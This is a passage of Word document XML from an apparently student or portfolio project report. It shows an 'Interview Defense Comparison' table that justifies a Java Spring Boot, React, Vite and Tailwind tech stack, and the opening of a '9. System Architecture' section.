              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interview Defense Comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend Runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Java LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>21 / 17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Strict type safety, virtual threads, pattern matching, record classes, and robust multi-threaded server performance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Chosen over Node.js for rigid type safety, enterprise memory management, and mature concurrency models.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Inversion of Control (IoC), Dependency Injection (DI), declarative @Transactional management, and embedded Tomcat.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Avoided Express.js to leverage Spring's unified ecosystem, compile-time validation, and automated transactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Component-based SecurityFilterChain bean architecture, OncePerRequestFilter, defense against CORS/XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Replaced deprecated WebSecurityConfigurerAdapter with modern component SecurityFilterChain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Data JPA / Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hibernate 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Object-Relational Mapping (ORM), automated query derivation, dirty checking, first-level caching.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Preferred over raw JDBC/MyBatis for rapid domain modeling and schema migration lifecycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2 In-Memory (Dev) / MySQL 8 (Prod)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2.2.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Zero-friction instant startup with pre-seeded data in dev; production-ready for MySQL 8 with identical JPA entities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2 allows instant developer evaluation without Docker setup; switching to MySQL requires only an application.properties profile change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Frontend Library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>React</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>18.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Component-based architecture, Virtual DOM diffing, concurrent rendering, and hook-based state encapsulation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Selected over Angular for lighter bundle footprint and flexible component composition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Build Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Native ES Modules (ESM) hot reloading powered by esbuild; near-instant development server boot and optimized Rollup bundling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vastly superior to legacy Create-React-App/Webpack, reducing cold start times from 30s to under 300ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Styling System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tailwind CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3.4.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Utility-first CSS, zero runtime overhead, custom Red &amp; White palette tokens, responsive grid system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Eliminates global CSS naming collisions and ensures strict design consistency across components.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>9. System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The application is architected around a 3-Tier Layered Architecture with clear boundaries between the Presentation Tier, Application (Business Logic) Tier, and Data Persistence Tier:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: GlobalCo 3-Tier Layered Architecture &amp; Data Flow Pipeline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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-----------------------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>|                               PRESENTATION TIER (CLIENT)                                |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
